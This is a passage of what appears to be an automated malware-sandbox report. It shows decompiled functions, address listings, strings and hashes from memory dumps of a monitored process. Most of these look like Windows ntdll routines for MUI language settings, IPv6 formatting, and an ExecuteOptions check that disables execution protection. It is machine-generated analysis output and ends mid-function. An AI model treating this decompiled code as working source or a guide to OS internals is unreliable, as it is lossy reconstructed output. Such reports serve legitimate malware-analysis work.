Instruction Fuzzy Hash: 1BD02B7134030137EA10BAE18C43F6F37899B45750F094070F989E73C3D951D50189E1

Uniqueness

Uniqueness Score: -1.00%

Function 0008D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: c1cfe86d0508fd5e1fbc3651e45fb5d487ddecafc616ea5c1bf8ba266a155821
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: E9D0A7717903043BEA10FAA49C03F6733CDAB44B00F494064F948D73C3D960F9004561

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02908788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02908788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02908460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E028EE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0290718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02908460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0290718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02908460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02908460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02908460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0290718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E028EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E028E2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E028FE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E028EE2A8(_t322,  &_v68, _v16);
								if(E02905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E028FE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E028EE2A8(_t322,  &_v68, _t236);
								if(E02905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0290718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E028EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E028E2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E028FE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E028EE2A8(_v12,  &_v68, _v16);
							if(E02905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E028FE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E028EE2A8(_t322,  &_v68, _t269);
							if(E02905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0290718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E028EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E028E2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E028FE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E028EE2A8(_v12,  &_v68, _v16);
						if(E02905553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E028FE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E028EE2A8(_t322,  &_v68, _t296);
						if(E02905553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E028EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x02908788
0x02908788
0x02908791
0x02908794
0x02908798
0x0290879b
0x0290879e
0x029087a1
0x029087a4
0x029087a7
0x029087aa
0x029087af
0x02951ad3
0x02908b0a
0x02908b0d
0x02908b13
0x02908b19
0x02908b1f
0x02908b25
0x02908b2b
0x02908b31
0x02908b37
0x02908b3d
0x02908b46
0x02908b46
0x029087c6
0x029087d0
0x02951ae0
0x02951ae6
0x02951af8
0x02951af8
0x02951afd
0x02951afe
0x02951b01
0x02951b06
0x02951b06
0x029087d6
0x029087f2
0x029087f7
0x02908807
0x0290880a
0x0290880f
0x02908810
0x02908813
0x02908818
0x02908818
0x0290882c
0x02908831
0x02908838
0x02908908
0x02908920
0x029089f0
0x02908a08
0x02908af6
0x02908af6
0x02908af8
0x02908afb
0x02951beb
0x02951beb
0x02908b04
0x02951bf8
0x02951c0e
0x02951c13
0x02951c16
0x02951c16
0x02951bf8
0x00000000
0x02908b04
0x02908a0e
0x02908a11
0x02908a14
0x02908a15
0x02908a18
0x02908a22
0x02908b59
0x02908a28
0x02908a3c
0x02908a3c
0x02908a42
0x02951bb0
0x02951b11
0x02951b11
0x00000000
0x02908a48
0x02908a51
0x02908a5b
0x02908a5e
0x02908a61
0x02908a69
0x02908a69
0x02908a6d
0x00000000
0x00000000
0x02908a74
0x02908a7c
0x02908a7d
0x02908a91
0x02908a93
0x02908a93
0x02908a98
0x02908a9b
0x02908aa1
0x02908aa1
0x02908aa4
0x02908aaa
0x02908ab1
0x02908ac5
0x02908ac7
0x02908ac7
0x02908ac5
0x02908ace
0x02951bc9
0x02951bce
0x02951bd2
0x02951bd2
0x02908ad8
0x02908aeb
0x02908aeb
0x02908af0
0x02908af4
0x00000000
0x02908af4
0x02908a42
0x02908926
0x02908929
0x0290892c
0x0290892d
0x02908930
0x02908935
0x0290893a
0x02908b51
0x02908940
0x02908954
0x02908954
0x0290895a
0x02951b63
0x00000000
0x02908960
0x02908969
0x02908973
0x02908976
0x02908979
0x0290897e
0x02908981
0x02908981
0x02908986
0x00000000
0x00000000
0x02951b6e
0x02951b74
0x02951b7b
0x02951b8f
0x02951b91
0x02951b91
0x02951b99
0x02951b9c
0x02951ba2
0x02951ba2
0x0290898c
0x02908992
0x02908999
0x029089ad
0x02951ba8
0x02951ba8
0x029089ad
0x029089b6
0x029089c8
0x029089cd
0x029089d0
0x029089d0
0x029089d6
0x029089e8
0x029089e8
0x029089ed
0x00000000
0x029089ed
0x0290895a
0x0290883e
0x02908841
0x02908844
0x02908845
0x02908848
0x0290884d
0x02908852
0x02908b49
0x02908858
0x0290886c
0x0290886c
0x02908872
0x02951b0e
0x00000000
0x02908878
0x02908881
0x0290888b
0x0290888e
0x02908891
0x02908896
0x02908899
0x02908899
0x0290889e
0x00000000
0x00000000
0x02951b21
0x02951b27
0x02951b2e
0x02951b42
0x02951b44
0x02951b44
0x02951b4c
0x02951b4f
0x02951b55
0x02951b55
0x029088a4
0x029088aa
0x029088b1
0x029088c5
0x02951b5b
0x02951b5b
0x029088c5
0x029088ce
0x029088e0
0x029088e5
0x029088e8
0x029088e8
0x029088ee
0x02908900
0x02908900
0x02908905
0x00000000
0x02908905

APIs

_wcspbrk.LIBCMT ref: 02908891
_wcspbrk.LIBCMT ref: 02908979
_wcspbrk.LIBCMT ref: 02908A61
_wcspbrk.LIBCMT ref: 02908A9B
_wcspbrk.LIBCMT ref: 02951B9C

Strings

Kernel-MUI-Number-Allowed, xrefs: 029087E6
Kernel-MUI-Language-SKU, xrefs: 029089FC
WindowsExcludedProcs, xrefs: 029087C1
Kernel-MUI-Language-Allowed, xrefs: 02908827
Kernel-MUI-Language-Disallowed, xrefs: 02908914

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 25a638a939e1faa5697ecafbf88add0155c4216aeb6b853c0907b6b9a5627235
Instruction ID: 66e5060f0cbffe197bffc363c87248fab20087599daf63f7984bbe4f245c789d
Opcode Fuzzy Hash: 25a638a939e1faa5697ecafbf88add0155c4216aeb6b853c0907b6b9a5627235
Instruction Fuzzy Hash: 11F1F7B6E0020DEFCF11DF99C980AEEB7B9BF08304F14446AE506A7251E7349A45DF61

Uniqueness

Uniqueness Score: -1.00%

Function 029213CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E029213CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02917707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x28e2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02917707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x28e9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02917707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02917707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02917707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02917707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x029213d5
0x029213d9
0x029213dc
0x029213de
0x029213e1
0x029213e8
0x029213ee
0x0294e8fd
0x00000000
0x0294e921
0x0294e921
0x0294e928
0x0294e982
0x0294e98a
0x00000000
0x0294e99a
0x0294e99e
0x0294e9a3
0x0294e9a8
0x0294e9b9
0x0294e978
0x00000000
0x0294e978
0x0294e98a
0x0294e92a
0x0294e931
0x0294e944
0x0294e944
0x0294e950
0x0294e954
0x0294e959
0x0294e95e
0x0294e963
0x0294e970
0x00000000
0x0294e975
0x0294e93b
0x0294e980
0x00000000
0x0294e980
0x0294e942
0x0294e94b
0x00000000
0x0294e94b
0x00000000
0x0294e942
0x029213f4
0x029213f4
0x029213f9
0x029213fc
0x029213ff
0x02921406
0x0294e9cc
0x0294e9d2
0x0294e9d2
0x0294e9cc
0x0292140c
0x02921411
0x02921431
0x0292143a
0x0292143c
0x0292143f
0x0292143f
0x02921442
0x02921447
0x029214a8
0x029214ac
0x0294e9e2
0x0294e9e7
0x0294e9ec
0x0294ea05
0x0294ea05
0x00000000
0x02921449
0x00000000
0x02921449
0x0292144c
0x02921459
0x02921462
0x02921469
0x0292146a
0x02921470
0x02921473
0x02921476
0x02921476
0x02921490
0x02921495
0x0292138e
0x02921390
0x02921397
0x02921398
0x02921399
0x029213a1
0x029213a4
0x029213a4
0x02921498
0x0292149c
0x0292149f
0x029214a2
0x00000000
0x00000000
0x029214a4
0x00000000
0x029214a4
0x02921413
0x02921415
0x02921416
0x02921419
0x0292141c
0x02921422
0x029213b7
0x029213bc
0x029213bf
0x029213bf
0x029213c2
0x02921424
0x02921424
0x02921424
0x02921427
0x0292142b
0x0292142c
0x0292142c
0x0292142c
0x00000000
0x0292141c
0x02921411

APIs

___swprintf_l.LIBCMT ref: 0292146B
___swprintf_l.LIBCMT ref: 02921490
___swprintf_l.LIBCMT ref: 0294E970

Strings

::%hs%u.%u.%u.%u, xrefs: 0294E967
:%u.%u.%u.%u, xrefs: 0294E9F4
ffff:, xrefs: 0294E94B
::ffff:0:%u.%u.%u.%u, xrefs: 0294E9B0

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 123f10b9757dbe3b5c927e2559b529624ee167c2f87a1acc922de2b2733392af
Instruction ID: 5739e078fe59acd5d9c4122971621c22505aa7164bd9280d629eb6715a29ccc6
Opcode Fuzzy Hash: 123f10b9757dbe3b5c927e2559b529624ee167c2f87a1acc922de2b2733392af
Instruction Fuzzy Hash: 85615675D00665AADF34CF99C8808BEBBBAFF85300B14C42DE4DE47645D774A658CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02917EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02917EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x29c2088; // 0x7758bff3
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02917F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02933F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E028EDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x29c4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02933F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E028F0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02933F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E028F8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02933F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0295E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02933F92();
					_t38 = 1;
					L2:
					return E028EE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x02917f08
0x02917f0f
0x02917f12
0x02917f1b
0x02917f31
0x02933ead
0x02933eb4
0x00000000
0x00000000
0x02933eba
0x02933ecd
0x02933ed2
0x02933ee1
0x02933ee7
0x02933eec
0x02933f12
0x02933f18
0x02933f1a
0x00000000
0x00000000
0x02933f20
0x02933f26
0x02933f28
0x00000000
0x00000000
0x02933f2e
0x02933f30
0x00000000
0x00000000
0x02933f3a
0x02933f3b
0x02933f53
0x02933f64
0x02933f69
0x02933f6c
0x02933f6d
0x02933f6f
0x0293e304
0x0293e30f
0x0293e315
0x0293e31e
0x0293e321
0x0293e327
0x0293e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0293e32f
0x0293e32f
0x0293e337
0x0293e33a
0x0293e33b
0x0293e33d
0x0293e33f
0x0293e341
0x0293e341
0x0293e34e
0x0293e353
0x0293e358
0x0293e35d
0x0293e35f
0x00000000
0x00000000
0x0293e365
0x0293e365
0x0293e368
0x0293e36e
0x00000000
0x00000000
0x0293e374
0x0293e32f
0x02933f75
0x02933f7a
0x02933f7c
0x02933f7e
0x02933f86
0x02917f39
0x02917f47
0x02917f47
0x02917f37
0x02917f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02933F12

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02933F4A
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0293E2FB
ExecuteOptions, xrefs: 02933F04
Execute=1, xrefs: 02933F5E
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02933F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 0293E345
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02933EC4

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 0f559f51bb3f6ee7a8b1bbd5538b761117cf2b3a407ef55c28712e0a06f5a098
Instruction ID: 9f919a5f8e1376ef983b4da3ab1d5ffc164a5cf85237739d9be04b092750f451
Opcode Fuzzy Hash: 0f559f51bb3f6ee7a8b1bbd5538b761117cf2b3a407ef55c28712e0a06f5a098
Instruction Fuzzy Hash: 1741E73568021D7AEF21DA94DC85FEBB3BDAF55704F0004A9A506E6180EB70DA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02920B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02920B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E028F8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
